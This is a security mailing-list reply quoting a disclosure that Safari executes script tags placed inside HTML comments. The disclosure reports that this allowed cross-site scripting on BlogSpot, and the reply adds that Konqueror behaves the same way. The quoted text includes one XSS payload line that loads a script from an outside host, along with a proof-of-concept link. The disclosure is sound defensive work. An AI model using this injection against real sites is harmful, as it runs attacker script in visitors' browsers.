<<< Date Index >>>     <<< Thread Index >>>

Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability



Jose Avila III wrote:
> Overview:
> 
> Safari on occasions may improperly parse the source of an HTML document,
> which can lead to the execution of html tags within comments. This can
> become dangerous when input filters allow html tags within comments, as
> they will get parsed and executed under certain circumstances.
> 
> Details:
> 
> In some cases you can cause Apple’s Safari browser to execute code when
> it should not be executed. In the following example everything within
> the comment, in theory should never be executed; however, safari decides
> to execute the script tag.
> 
> <title>myblog<!--</title></head><body><script
> src=http://beanfuzz.com/bean.js> --></title>
> 
> Blogs hosted on BlogSpot.com have filter mechanisms for their input;
> however, they will allow you to inject anything within comments. This
> made it possible to cross site script blogspot.com. Note: Only Safari
> viewers will be affected.
> 
> Proof of concept: http://dirtybean1234.blogspot.com/
> 
> Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99
> 
> Vendor Response:
> 
> I was unable to get a response from the vendor in regards to this issue
> 
> Questions / Comments:
> Jose (at) onzra (dot) com
> 

As could be expected, the same problem exists in Konqueror (tested
v.3.5.5 on Debian GNU/Linux Sid).

regards,
  Robert Tasarz